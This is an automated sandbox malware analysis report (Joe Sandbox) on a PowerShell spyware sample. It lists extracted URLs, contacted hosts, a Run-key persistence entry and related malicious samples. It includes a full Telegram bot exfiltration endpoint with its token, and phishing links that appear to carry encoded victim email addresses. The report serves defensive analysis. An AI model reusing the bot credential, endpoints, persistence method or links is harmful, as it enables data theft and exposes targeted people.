                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2445820760.0000024417F61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA7F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://minecap4-22-24.blogspot.com/powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.blogger.compowershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmptrue
                                                                • URL Reputation: malware
                                                                unknown
                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://a9.com/-/spec/opensearchrss/1.0/powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://go.micropowershell.exe, 0000000F.00000002.2322477147.000002D2AACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2D4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://img1.blogblog.com/img/b16-rounded.gifpowershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contoso.com/Iconpowershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/RegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crl.ver)svchost.exe, 00000012.00000002.3247677107.00000235C680D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          low
                                                                          http://upx.sf.netAmcache.hve.10.drfalse
                                                                            high
                                                                            http://minecap4-22-24.blogspot.compowershell.exe, 0000000F.00000002.2322477147.000002D2AB25C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AACF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2D4B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://api.ipify.org/tRegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://minecap4-22-24.blogspot.powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocumentLRRegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://g.live.com/odclientsettings/Prod/C:edb.log.18.dr, qmgr.db.18.drfalse
                                                                                      high
                                                                                      http://schemas.google.com/blogger/2008powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://minecap4-22-24.blogspot.com/feeds/posts/defaultpowershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crl.micropowershell.exe, 00000017.00000002.2629762784.0000028E45324000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://minecap4-22-24.blogspot.compowershell.exe, 0000000F.00000002.2322477147.000002D2AB268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB2A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.2445820760.0000024417F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA83E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AA82B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2CFE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.georss.org/georsspowershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • 1%, Virustotal, Browse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://api.telegram.orgRegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.0000000002A09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.vpowershell.exe, 00000017.00000002.2530488190.0000028E2B0F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.blogger.com/styles/atom.csspowershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    142.251.15.132
                                                                                                    blogspot.l.googleusercontent.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    208.95.112.1
                                                                                                    ip-api.comUnited States
                                                                                                    53334TUT-ASUSfalse
                                                                                                    149.154.167.220
                                                                                                    api.telegram.orgUnited Kingdom
                                                                                                    62041TELEGRAMRUfalse
                                                                                                    172.67.74.152
                                                                                                    api.ipify.orgUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    IP
                                                                                                    127.0.0.1
                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                    Analysis ID:1431777
                                                                                                    Start date and time:2024-04-25 19:00:11 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 7m 15s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:29
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:o3KyzpE7F4.ps1
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:286e6941de5c1fdf6b1dfc6726c0c6f0.ps1
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winPS1@29/26@4/5
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 37.5%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 71%
                                                                                                    • Number of executed functions: 159
                                                                                                    • Number of non-executed functions: 17
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .ps1
                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 40.127.169.103, 23.40.205.9, 23.40.205.40, 23.40.205.75, 23.40.205.49, 23.40.205.57, 23.40.205.48, 23.40.205.11, 23.40.205.41, 23.40.205.35, 199.232.210.172, 192.229.211.108, 13.85.23.206, 40.126.28.21, 40.126.7.35, 40.126.28.11, 40.126.28.13, 40.126.7.32, 40.126.28.23, 40.126.28.14, 40.126.28.20, 20.242.39.171, 20.189.173.22, 23.63.206.91, 23.40.205.26, 23.40.205.51, 23.40.205.73, 23.40.205.67, 23.40.205.83, 23.40.205.56, 23.40.205.74
                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                    • Execution Graph export aborted for target RegSvcs.exe, PID 4956 because it is empty
                                                                                                    • Execution Graph export aborted for target RegSvcs.exe, PID 6784 because it is empty
                                                                                                    • Execution Graph export aborted for target mshta.exe, PID 5392 because there are no executed function
                                                                                                    • Execution Graph export aborted for target mshta.exe, PID 7820 because there are no executed function
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7196 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                    TimeTypeDescription
                                                                                                    19:00:59API Interceptor171x Sleep call for process: powershell.exe modified
                                                                                                    19:01:24API Interceptor1412991x Sleep call for process: RegSvcs.exe modified
                                                                                                    19:01:31API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                    19:01:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DRAKEXnew1 schtasks /run /tn DRAKEXnew1
                                                                                                    19:01:36API Interceptor2x Sleep call for process: dw20.exe modified
                                                                                                    19:01:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DRAKEXnew1 schtasks /run /tn DRAKEXnew1
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    208.95.112.1SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                    • ip-api.com/json
                                                                                                    Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                                                    • ip-api.com/json
                                                                                                    Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    149.154.167.220UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                                                                      Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                X1.exeGet hashmaliciousXWormBrowse
                                                                                                                  Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                                    X2.exeGet hashmaliciousXWormBrowse
                                                                                                                      HS202410407 Elemento de proyecto MSMU5083745.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        172.67.74.152Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                                                                                                        • api.ipify.org/?format=json
                                                                                                                        Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • api.ipify.org/?format=json
                                                                                                                        Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • api.ipify.org/?format=json
                                                                                                                        Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                                                                                        • api.ipify.org/?format=json
                                                                                                                        Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                                                                                        • api.ipify.org/?format=json
                                                                                                                        SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • api.ipify.org/?format=json
                                                                                                                        SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • api.ipify.org/?format=json
                                                                                                                        Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • api.ipify.org/?format=json
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        fp2e7a.wpc.phicdn.nethttp://www.jdenviro.caGet hashmaliciousUnknownBrowse
                                                                                                                        • 192.229.211.108
                                                                                                                        https://rro5wktwxr4n.rollout-specialist-assistance-network.cfd/support_case_ID/#8347435238Get hashmaliciousUnknownBrowse
                                                                                                                        • 192.229.211.108
                                                                                                                        https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 192.229.211.108
                                                                                                                        https://r20.rs6.net/tn.jsp?f=001mdupJ4qBb-Nd2_ylzx8HBttlQ9opTAsCLDNaIzR_kjOMUNmpNcZJwTrf1-JKcQms1CJ9Uho976bwGC08_tX5C5noMjVDoDyLOXoK3aopxxStOM8t6wvTBKWgVo18etJYQ_eeHjJ4R2lwkep1pKOUg8VLdGfphtuo&c=&ch=/Er8BdK9PMSuOgr2lskWkeZAKVKx339#?ZnJhbmtfZHJhcGVyQGFvLnVzY291cnRzLmdvdg==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 192.229.211.108
                                                                                                                        http://lyddemper.comGet hashmaliciousUnknownBrowse
                                                                                                                        • 192.229.211.108
                                                                                                                        file.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                                                                        • 192.229.211.108
                                                                                                                        https://runrun.it/share/portal/x1pWDYC5l2f72kuwGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 192.229.211.108
                                                                                                                        http://seattlend.comGet hashmaliciousUnknownBrowse
                                                                                                                        • 192.229.211.108
                                                                                                                        https://1drv.ms/o/s!AmFI0faGJpjZhESzK-ltQ-Z_UHmf?e=0OfhLSGet hashmaliciousUnknownBrowse
                                                                                                                        • 192.229.211.108
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 192.229.211.108
                                                                                                                        ip-api.comSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        api.telegram.orgUMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        X1.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        X2.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        api.ipify.orghttp://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                                                                                        • 104.26.12.205
                                                                                                                        16770075581.zipGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 104.26.12.205
                                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 104.26.12.205
                                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 104.26.12.205
                                                                                                                        Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 104.26.13.205
                                                                                                                        Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 104.26.12.205
                                                                                                                        DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 104.26.13.205
                                                                                                                        M_F+niestandardowy stempel.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 172.67.74.152
                                                                                                                        responsibilityleadpro.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                        • 104.26.12.205
                                                                                                                        F#U0130YAT TEKL#U0130F.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                        • 104.26.12.205
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        TELEGRAMRUhttp://rfpteams.ksplastlc.netGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.99
                                                                                                                        UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        X1.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        X2.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        TUT-ASUSSecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        Control-Tributario_KFRCkzlbCHUSEBMRSECA.zipGet hashmaliciousUnknownBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        SARL RABINEAU Order FA2495.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        PURCHASE ORDER LIST GREEN VALLY CORP PDF.batGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                        • 208.95.112.1
                                                                                                                        CLOUDFLARENETUShttp://www.mh3solaroh.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.17.246.203
                                                                                                                        https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 172.67.69.226
                                                                                                                        https://www.jottacloud.com/s/3542495a6cd3d7a4aafad5878d671fdee68Get hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.152.4
                                                                                                                        http://email.wantyourfeedback.com/ls/click?upn=u001.PD4nPnyJUo8oiEzSkSGLgaBNAMtLp9U5nstWElDmnpXtySPOXSs4GxXhEZNYegDWlOpy_1gt1aDjd5mPVItYgazWgABkVm-2FZUH6kt1lIvkdtkRWsfoyQV18ixDvOX-2B0tU4ZH6SMN7PC0YJjM3gcvFPvh6CbZuFXlOBXf3FWLiJkpKJ7Hjba3S4-2FzhpmkR8VdprfK8GO3qSu-2BzqpIaLLC-2Bva9kOn7HY5B7OIgz5EOl88o1lnRSRpayTzqRzTSFhtg2Bi-2BI4dAZ7qHRbJ3vb9lcrxBKqAk13I-2BCAvndhSK1Vi4ubCjlp2xQlrXIHfzqmLiSPjl7tEmTsLYr99h3esBOPv8ASLIpf873P512I7xYEOjogT1gQCerfZNqh6K2IdWU6lDJ2r3wpU6ug02vU9Zslw4DYpuNNZQNVtap5mqv9Xf8D1PYQxYI5BK4owXOV2wEXeRIjST24XAw6EO9D1tdiGoHDRaxW2QofayefCuiW9Z191aML90svJWojHiQp1Fq-2BXFLiyEx8V1eLa7dixfJ23RRWtHvg1jOrHp7lqvXRA7dobs-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 172.67.223.170
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.16.225
                                                                                                                        http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                                                                                        • 104.26.0.231
                                                                                                                        https://rro5wktwxr4n.rollout-specialist-assistance-network.cfd/support_case_ID/#8347435238Get hashmaliciousUnknownBrowse
                                                                                                                        • 172.67.222.163
                                                                                                                        https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.21.17.5
                                                                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                        • 104.26.5.15
                                                                                                                        https://r20.rs6.net/tn.jsp?f=001mdupJ4qBb-Nd2_ylzx8HBttlQ9opTAsCLDNaIzR_kjOMUNmpNcZJwTrf1-JKcQms1CJ9Uho976bwGC08_tX5C5noMjVDoDyLOXoK3aopxxStOM8t6wvTBKWgVo18etJYQ_eeHjJ4R2lwkep1pKOUg8VLdGfphtuo&c=&ch=/Er8BdK9PMSuOgr2lskWkeZAKVKx339#?ZnJhbmtfZHJhcGVyQGFvLnVzY291cnRzLmdvdg==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.17.2.184
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        1138de370e523e824bbca92d049a3777http://www.jdenviro.caGet hashmaliciousUnknownBrowse
                                                                                                                        • 23.1.237.91
                                                                                                                        Isass.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 23.1.237.91
